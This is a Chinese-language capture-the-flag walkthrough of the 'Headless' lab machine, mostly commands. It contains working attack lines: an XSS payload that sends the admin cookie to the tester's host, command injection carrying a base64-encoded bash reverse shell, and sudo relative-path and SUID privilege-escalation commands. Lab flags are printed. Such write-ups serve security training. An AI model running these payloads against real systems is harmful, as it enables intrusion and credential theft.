[Meachines][Easy]Headless

2024-04-25 886 0

Tools

https://github.com/MartinxMax/MDOG

针对XXS攻击

[Meachines][Easy]Headless插图

Main

$ nmap -sC -sV 10.10.11.8 --min-rate 1000

[Meachines][Easy]Headless插图1

类似于留言板

[Meachines][Easy]Headless插图2

通过目录扫描,发现一个仪表盘

$ gobuster dir -u "http://10.10.11.8:5000" -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

[Meachines][Easy]Headless插图3

[Meachines][Easy]Headless插图4

回到留言板

[Meachines][Easy]Headless插图5

说IP已经被记录,那么我们尝试在数据包中的User-Agent字段注入js语句

管理员不过一会就中xss了

[Meachines][Easy]Headless插图6

运行,复制payload,burp重放

<img src=1 onerror=window.open("http://10.10.14.25:9999/?id="+document.cookie)>

[Meachines][Easy]Headless插图7

修改cookie

[Meachines][Easy]Headless插图8

http://10.10.11.8:5000/dashboard

[Meachines][Easy]Headless插图9

存在RCE

[Meachines][Easy]Headless插图10

$ echo "bash -i >& /dev/tcp/10.10.14.25/10032 0>&1"|base64

date=;echo%20YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4yNS8xMDAzMiAwPiYxCg==|base64%20-d>/tmp/shell.sh;chmod%20777%20/tmp/shell.sh;ls%20-al%20/tmp/shell.sh;echo%20'---------------';cat%20/tmp/shell.sh

这里面的+号需要进行url编码

[Meachines][Easy]Headless插图11

date=;/bin/bash%20/tmp/shell.sh

[Meachines][Easy]Headless插图12

User Flag

cat /home/dvir/user.txt

[Meachines][Easy]Headless插图13

e2576236e9f7ebc8b857de1f2c10fe63

Root Flag

$ sudo -l

[Meachines][Easy]Headless插图14

$ strings /usr/bin/syscheck

[Meachines][Easy]Headless插图15

这个initdb.sh文件在本服务器是没有的,可以利用它

有趣的是./是一个相对路径
在app目录下执行/usr/bin/syscheck后,里的./initdb.sh指向的是app目录下的initdb.sh,而不是指向/usr/bin/下的initdb.sh

知识点:
查看当前用户在当前主机上的 sudo 权限,所列出的文件必须加sudo运行才是高权限

[Meachines][Easy]Headless插图16

(~app)$ echo '/bin/bash'>initdb.sh;chomod +x initdb.sh;sudo /usr/bin/syscheck

成功提权

[Meachines][Easy]Headless插图17

[Meachines][Easy]Headless插图18

927acc092719872f616c53b4a0e910a9

Another

海外的大牛wp是

(~app)$ echo "chmod u+s /bin/bash" >initdb.sh;chmod +x initdb.sh;sudo /usr/bin/syscheck;/bin/bash -p

在普通用户下是无法给/bin/bash加SUID的

[Meachines][Easy]Headless插图19

这里大牛的思路是利用sudo /usr/bin/syscheck执行的高权限执行initdb.sh,然后给/bin/bash添加一个SUID,这将意味着任意用户使用-p参数 privileged mode(特权模式)调用/bin/bash时候都将以root权限身份运行

[Meachines][Easy]Headless插图20

我们再次返回到RCE点,发现的确如此

date=;/bin/bash%20-c%20-p%20"whoami"

[Meachines][Easy]Headless插图21


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论